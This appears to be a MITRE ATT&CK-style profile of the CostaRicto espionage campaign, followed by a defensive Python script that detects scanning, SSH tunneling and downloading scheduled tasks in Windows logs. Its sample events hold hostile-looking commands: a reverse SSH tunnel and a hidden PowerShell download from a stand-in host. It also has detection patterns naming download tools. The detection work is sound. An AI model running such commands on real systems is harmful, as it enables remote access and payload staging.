CostaRicto is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. CostaRicto's targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.[1]
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1046 | Network Service Discovery | CostaRicto employed nmap and pscan to scan target environments.[1] |
| Enterprise | T1588.002 | Obtain Capabilities: Tool | CostaRicto has obtained open source tools to use in their operations.[1] |
| Enterprise | T1572 | Protocol Tunneling | CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain.[1] |
| Enterprise | T1090.003 | Proxy: Multi-hop Proxy | CostaRicto has used a layer of proxies to manage C2 communications.[1] |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | CostaRicto has used scheduled tasks to download backdoor tools.[1] |
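As an added illustration that is not part of this ATT&CK entry or the cited report, the following Python sketch shows how three of the behaviors in the table could be surfaced from Windows host telemetry: port-scanner execution (T1046), an SSH client started with tunnel-forwarding flags (T1572), and a newly registered scheduled task whose action downloads content from the network (T1053.005). The event records, hostnames, the `updates-cdn.example` domain and all command lines are constructed for the example; the matched tool names and download patterns are generic indicators, not artifacts attributed to CostaRicto.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real CostaRicto data): Windows process-creation
# (4688) and scheduled-task-creation (4698) records reduced to the fields used below.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "ws01", "user": "alice",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"id": 4688, "host": "ws01", "user": "alice",
     "image": r"C:\Tools\nmap\nmap.exe",
     "cmdline": "nmap.exe -sS -p 1-1024 10.0.0.0/24"},
    {"id": 4688, "host": "srv02", "user": "svc_backup",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     # Reverse forward: port 2222 on the remote host reaches RDP on this machine.
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:3389 ops@updates-cdn.example"},
    {"id": 4698, "host": "srv02", "user": "svc_backup",
     "task": r"\Microsoft\Windows\UpdateCheck",
     "action": 'powershell.exe -w hidden -c "iwr http://updates-cdn.example/s.bin '
               '-OutFile C:\\ProgramData\\s.bin"'},
    {"id": 4698, "host": "srv03", "user": "SYSTEM",
     "task": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "action": r"%windir%\system32\defrag.exe -c -h -k -g -$"},
]

# Scanner binaries named on the page; extend with whatever your environment sees.
SCANNER_NAMES = {"nmap.exe", "nmap", "pscan.exe", "pscan"}

# Common Windows "living off the land" download primitives (generic, not campaign-specific).
DOWNLOAD_RE = re.compile(
    r"\biwr\b|invoke-webrequest|downloadfile|downloadstring"
    r"|certutil(\.exe)?\s+.*-urlcache|bitsadmin(\.exe)?\s+.*/transfer"
    r"|\bcurl(\.exe)?\s|\bwget(\.exe)?\s",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# OpenSSH flags that establish a tunnel: -R remote forward, -L local forward,
# -D dynamic SOCKS proxy, -w layer-3 tun device.
SSH_TUNNEL_RE = re.compile(r"\bssh(?:\.exe)?\b.*?\s-([RLDw])\s*\S+", re.IGNORECASE)


@dataclass
class Finding:
    technique: str
    host: str
    user: str
    detail: str


def check_process(ev):
    """Inspect a 4688 record for scanner execution or SSH tunnel setup."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    if image in SCANNER_NAMES:
        return Finding("T1046", ev["host"], ev["user"], f"port scanner launched: {cmd}")
    m = SSH_TUNNEL_RE.search(cmd)
    if m:
        return Finding("T1572", ev["host"], ev["user"],
                       f"ssh started with tunnel flag -{m.group(1)}: {cmd}")
    return None


def check_task(ev):
    """Inspect a 4698 record: flag task actions that fetch remote content."""
    action = ev["action"]
    if DOWNLOAD_RE.search(action):
        urls = URL_RE.findall(action)
        return Finding("T1053.005", ev["host"], ev["user"],
                       f"task {ev['task']} downloads {urls or 'remote content'}")
    return None


def analyze(events):
    """Run the per-event checks and return the list of findings in input order."""
    findings = []
    for ev in events:
        if ev["id"] == 4688:
            f = check_process(ev)
        elif ev["id"] == 4698:
            f = check_task(ev)
        else:
            f = None
        if f is not None:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.technique:10} {f.host:6} {f.user:11} {f.detail}")
```

The scheduled-task check deliberately keys on the download primitive rather than on the task name, since a task registered under `\Microsoft\Windows\` is exactly how a staged download would try to blend in; a production rule would also want the 4698 event correlated with the outbound connection the task later makes, which is where the proxy layering in T1090.003 makes host-side detection more useful than destination blocklists.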